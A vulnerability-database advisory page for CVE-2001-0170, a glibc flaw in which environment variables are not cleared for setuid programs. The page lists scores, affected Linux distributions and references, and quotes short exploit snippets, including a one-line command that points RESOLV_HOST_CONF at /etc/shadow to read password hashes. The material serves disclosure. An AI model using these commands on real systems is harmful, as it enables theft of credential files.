Published: 26/03/2001 Updated: 10/10/2017

CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9

VMScore: 220

Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N

glibc 2.1.9x and previous versions does not properly clear the RESOLV_HOST_CONF, HOSTALIASES, or RES_OPTIONS environmental variables when executing setuid/setgid programs, which could allow local users to read arbitrary files.

Vulnerable Product	Search on Vulmon	Subscribe to Product
conectiva linux 4.0es
conectiva linux 4.1
conectiva linux 5.1
conectiva linux 6.0
immunix immunix 7.0_beta
conectiva linux 4.0
conectiva linux ecommerce
conectiva linux graficas
conectiva linux 4.2
conectiva linux 5.0
debian debian linux 2.3
redhat linux 7.0

setenv RESOLV_HOST_CONF /etc/shadow; ping adfas # milw0rmcom [1996-01-01] ...

# Charles Stevenson <csteven@newhopeterraplexcom> # glibc-22 and openssh-230p1 (Debian 23 , Redhat 70) # This exploits is for glibc >= 219x # (****krochos@linuxmailorg****) # Edit this if you have a problem with path ssh=/usr/bin/ssh traceroute=/usr/sbin/traceroute FILE=/etc/shadow # File to read ######################## ...

NVD-CWE-Other http://www.securityfocus.com/bid/2181 http://archives.neohapsis.com/archives/bugtraq/2001-01/0131.html http://archives.neohapsis.com/archives/bugtraq/2001-01/0186.html http://www.redhat.com/support/errata/RHSA-2001-001.html https://exchange.xforce.ibmcloud.com/vulnerabilities/5907 https://nvd.nist.gov https://www.exploit-db.com/exploits/317/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2001-0170

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect